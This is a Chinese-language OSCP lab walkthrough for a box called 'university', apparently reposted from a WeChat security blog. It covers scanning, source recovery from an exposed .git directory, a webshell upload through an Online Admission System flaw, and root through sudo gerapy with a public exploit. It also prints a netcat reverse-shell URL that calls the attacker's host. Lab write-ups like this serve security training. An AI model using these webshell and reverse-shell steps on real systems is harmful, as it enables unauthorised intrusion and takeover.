OSCP 靶场
靶场介绍
信息收集
主机发现
nmap -sn 192.168.31.0/24
端口扫描
└─# nmap -sV -A -p- -T4 192.168.31.142
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-14 22:58 EST
Nmap scan report for 192.168.31.142
Host is up (0.00095s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 8e:ee:da:29:f1:ae:03:a5:c3:7e:45:84:c7:86:67:ce (RSA)
| 256 f8:1c:ef:96:7b:ae:74:21:6c:9f:06:9b:20:0a:d8:56 (ECDSA)
|_ 256 19:fc:94:32:41:9d:43:6f:52:c5:ba:5a:f0:83:b4:5b (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
| http-git:
| 192.168.31.142:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Remotes:
|_ https://github.com/rskoolrash/Online-Admission-System
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
MAC Address: 08:00:27:E1:B2:29 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
目录扫描
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.230 -x html,php,txt -e
这里通过.git 找到网站源码
通过源码信息,下载oas.sql ,但是里面的账号密码被改了。
权限获取
这里直接Online Admission System 的历史漏洞
可以看到里面的代理利用的正是如下页面
http://192.168.31.142/documents.php
我们上传webshell 后直接获取权限
http://192.168.31.142/studentpic/123.php?cmd=nc%20192.168.31.181%208989%20-c%20/bin/bash
权限提升
在html 目录下找到隐藏文件,里面存在密码。尝试su 到sandra 账号,成功读取到user.txt
利用gerapy 提权到root 权限
利用该exp ,我们需要先启动gerapy 服务
项目地址:https://github.com/Gerapy/Gerapy
^Csandra@MiWiFi-R4ACv2-srv:~$ sudo gerapy init
sudo: unable to resolve host MiWiFi-R4ACv2-srv: No address associated with hostname
Initialized workspace gerapy
sandra@MiWiFi-R4ACv2-srv:~$ cd gerapy/
sandra@MiWiFi-R4ACv2-srv:~/gerapy$ sudo gerapy migrate
sudo: unable to resolve host MiWiFi-R4ACv2-srv: No address associated with hostname
Operations to perform:
Apply all migrations: admin, auth, authtoken, contenttypes, core, django_apscheduler, sessions
Running migrations:
Applying contenttypes.0001_initial... OK
Applying auth.0001_initial... OK
Applying admin.0001_initial... OK
Applying admin.0002_logentry_remove_auto_add... OK
Applying admin.0003_logentry_add_action_flag_choices... OK
Applying contenttypes.0002_remove_content_type_name... OK
...
Applying sessions.0001_initial... OK
sandra@MiWiFi-R4ACv2-srv:~/gerapy$
在这里,我们还必须初始化一个项目“gerapy”。
然后,我们使用 root 身份运行它,以便使用EXP远程命令执行来获取 root 权限。在此之前,我创建了一个超级管理员用户
启动后成功访问到gerapy 服务
由于exp 里面的账号密码同样为login/passwd,所以这里就不需要更改了。执行后成功提权到root
End
原文始发于微信公众号(贝雷帽SEC):【OSCP】university
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论